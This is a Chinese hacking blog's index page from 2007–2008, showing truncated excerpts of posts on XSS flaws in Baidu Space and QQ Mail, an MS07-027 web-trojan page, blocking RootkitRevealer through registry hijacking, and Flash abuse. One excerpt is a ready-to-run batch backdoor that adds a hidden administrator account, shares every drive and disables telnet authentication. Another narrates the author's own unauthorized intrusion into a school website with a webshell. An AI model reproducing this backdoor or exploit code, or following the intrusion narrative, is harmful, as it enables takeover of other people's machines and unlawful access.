余弦函数_博客

文章列表

您正在查看 "黑笔记" 分类下的文章

噬菌体军团

2008-03-30 00:25

噬菌体军团，期待的……NULL NULL NULL NULL NULL NULL NULL……

类别：黑笔记 | 评论(24) | 浏览()

黑色Google不错

2008-03-01 15:47

黑色的google，很不错，因为是黑色的。下面是我设计的页面，编码为gb2312，这样就避免了汉字查询时出现乱码。可以访问这：http://evilcos.googlepages.com/BlackGoogle.html或者http://www.cosblog.com/blackgoogle.html。

搜索结果页，页面上的元素颜色都是可以自定义的。代码如下，其中定义颜色等参数的用红色标出，细节就自己摸索。

阅读全文>>

类别：黑笔记 | 评论(21) | 浏览()

百度空间又有新威胁了

2008-01-07 22:49

下午四点剑心突然发QQ过来说，百度空间又来了个跨站。把我吓了一跳，我那时在干什么了，我好像在走神中……细节不公布，他的跨站方式和我的不一样，不过原理是一样的。

还是利用css，不过这个css不是一般思路上的css；还是expression，不过这个expression不需要任何的变形，很好，很邪恶！他这都挖掘出来了，厉害，反正这两天心情闷闷的，于是我也开始渗透。伪客户端我已经构造好了。

服务端过滤了单引号，导致常规执行远程js文件的方法就不可行了！使用

阅读全文>>

类别：黑笔记 | 评论(25) | 浏览()

与x黑客的一次过招！

2007-09-13 04:35

我的行为倾向于Gray Hat Hacking。深更半夜的时候收到同学的短信说教务处网站被挂马。我本对此事是睁一只眼，闭一只眼的……因为自己的处境是灰帽黑客(Gray Hat Hacker)的原因。不过还是有点忍不住了，终于开始入侵了！

也难怪教务处网站被挂马，数据库SA权限，空密码。防注入系统轻易绕过，入侵就这样一气呵成！我用我的webshell查到了其它黑客留下的后门，除了我自己的，还有四个。我判断这四个后门不应该是属于同一个黑客的。当务之急是清除挂马代码，在index.asp文件中发现代码（删掉！）：

阅读全文>>

类别：黑笔记 | 评论(28) | 浏览()

两种方法阻止RootkitRevealer运行

2007-05-29 20:12

RootkitRevealer号称检测Rootkit的一种很有效的工具。要躲避这类对付Rootkit的软件，必须拦截这类软件读取注册表配置单元数据或文件系统数据的操作，并更改这些数据的内容。这需要非常高深的技术，我不懂……不过我知道有两种方法可以防止RootkitRevealer的运行，而恶意软件要做到这两点将会非常的容易，不过也许会给自身带来点麻烦……

一、IFEO映像劫持：

在注册表这个位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executio

阅读全文>>

类别：黑笔记 | 评论(6) | 浏览()

MS07027漏洞网站挂马分析

2007-05-25 19:11

5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行，不过网上已经MS07027漏洞利用的工具了，我所了解的有两款：MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。

一、MS07027网马生成器会生成一个MS07027.html文件，内容如下：

<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa00

阅读全文>>

类别：黑笔记 | 评论(9) | 浏览()

BAT免杀后门

2007-05-21 16:00

@echo off
@attrib +r +s system.bat
@net user Guests 000 /add
@net localgroup administrators Guests /add
@sc config lanmanserver start= auto
@net start server
@net share C$=C:
@net share D$=D:
@net share E$=E:
@net share F$=F:
@net share G$=G:
@net share H$=H:
@net share I$=I:
@net share J$=J:
@net share K$=K:
@tlntadmn config sec = -ntlm
rem 设定身份验证机构：不认证

@sc config Schedule start= auto
@net stop "Task

阅读全文>>

类别：黑笔记 | 评论(15) | 浏览()

Flash的恶意行为技术随写

2007-05-01 13:23

Flash的fscommand这个函数可以执行任意文件，你想到了什么？我觉得现在的重点应该稍微转移到Flash在“恶意行为”的角色上了！一个月前我提起过flash与asp的通信问题。我在这方面也是刚开始深入，并且断断续续的，没什么值得高兴的进展！

Flash与JavaScript的通信问题也许会更加吸引人吧？估计反病毒的朋友一看到JavaScript就想到了挂马了^^。Flash自己的ActionScript脚本语言不是孤独的，它可以与其它语言进行通信

阅读全文>>

类别：黑笔记 | 评论(7) | 浏览()

QQ邮箱又一经典的跨站漏洞

2007-04-30 16:51

一个月前发现QQ邮箱漏洞：JavaScript跨站攻击与后来发布了QQ邮箱最新漏洞与微软ANI漏洞的利用！今天又发现了最新跨站利用方式！之前发现的漏洞现在都无效了，网上公布的一些QQ邮箱跨站漏洞经过测试也无效。现在公布此漏洞。要是有能力者可以去利用？测